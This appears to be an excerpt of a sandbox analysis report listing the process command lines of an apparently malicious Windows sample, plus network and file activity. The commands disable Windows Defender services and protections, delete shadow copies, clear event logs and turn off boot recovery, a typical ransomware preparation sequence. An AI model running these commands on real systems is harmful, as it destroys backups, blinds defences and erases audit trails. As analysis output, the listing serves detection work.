reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | geo.prod.do.dsp.mp.microsoft.com | udp |
| US | 52.143.86.214:443 | geo.prod.do.dsp.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | kv801.prod.do.dsp.mp.microsoft.com | udp |
| NL | 184.29.205.60:443 | kv801.prod.do.dsp.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | cp801.prod.do.dsp.mp.microsoft.com | udp |
| NL | 23.66.26.147:443 | cp801.prod.do.dsp.mp.microsoft.com | tcp |
| NL | 23.66.26.147:443 | cp801.prod.do.dsp.mp.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\ProgramData\USOShared\Logs\User\NotifyIcon.6f243341-f968-41e2-b188-9cf12fb6cd1a.1.etl